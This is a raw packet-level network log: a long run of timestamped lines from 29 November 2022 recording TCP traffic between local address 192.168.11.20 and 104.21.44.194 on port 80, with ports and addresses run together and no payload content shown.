                                                                          Nov 29, 2022 09:20:40.676032066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676049948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676048994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676070929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676085949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676100969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676115990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676129103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676141024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676153898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676171064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676186085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676198959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676211119 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676222086 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676229000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676248074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676265001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676278114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676290035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676301003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676323891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676337004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676348925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676362038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676373959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676388025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676388025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676388025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676404953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676418066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676429987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676443100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676455021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676466942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676480055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676491976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676505089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676517010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676527977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676539898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676552057 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676556110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676573038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676584959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676595926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676608086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676619053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676630020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676641941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676652908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676664114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676676035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676687002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676697969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676709890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676724911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676723003 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676743031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676748037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676762104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676776886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676788092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676800013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676810980 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676822901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676834106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676845074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676855087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676866055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676877975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676886082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676886082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.676896095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676909924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676920891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676932096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676944017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676954985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676965952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676978111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.676989079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677000046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677011967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677022934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677033901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677046061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677057981 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677058935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677061081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677078962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677092075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677103043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677114010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677125931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677136898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677149057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677160025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677170992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677181959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677194118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677205086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677216053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677222967 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677233934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677247047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.677392006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685390949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685523033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685542107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685558081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685569048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685579062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685590029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685604095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685615063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685625076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685636044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685647011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685657978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685667992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685678959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685765982 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685889006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685914040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685931921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.685946941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685971022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.685996056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686007977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686019897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686031103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686043024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686053991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686064005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686074972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686085939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686096907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686100960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686114073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686125040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686136007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686147928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686158895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686170101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686182022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686192989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686218023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686243057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686254025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686276913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686292887 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686306000 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686316013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686326981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686336994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.686490059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686490059 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.686676979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691003084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691140890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691152096 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691162109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691174030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691184998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691195965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691207886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691220045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691230059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691241026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691251993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691278934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691289902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691299915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691310883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691322088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691332102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691343069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691405058 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691405058 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691405058 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691423893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691423893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691453934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691472054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691488028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691499949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691510916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691520929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691538095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691548109 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691565037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691576004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691586971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691595078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691595078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691611052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691626072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691643000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691654921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691667080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691679001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691694975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691710949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691724062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691736937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691747904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691760063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691765070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691765070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691765070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691765070 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691787958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691819906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691869020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.691936016 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691936016 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.691936016 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.692094088 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700035095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700144053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700156927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700210094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700222969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700234890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700254917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700268030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700280905 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700294971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700349092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700367928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700380087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700406075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700412035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700440884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700453043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700489998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700504065 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700521946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700536966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700548887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700551033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700577974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700609922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700623989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700640917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700650930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700664043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700676918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700694084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700706005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700719118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700720072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700720072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700720072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700720072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700720072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.700731039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700742960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700754881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700767994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700779915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700804949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700817108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700829029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700839996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700851917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700862885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700874090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700886011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700915098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.700932980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.701090097 CET4985280192.168.11.20104.21.44.194
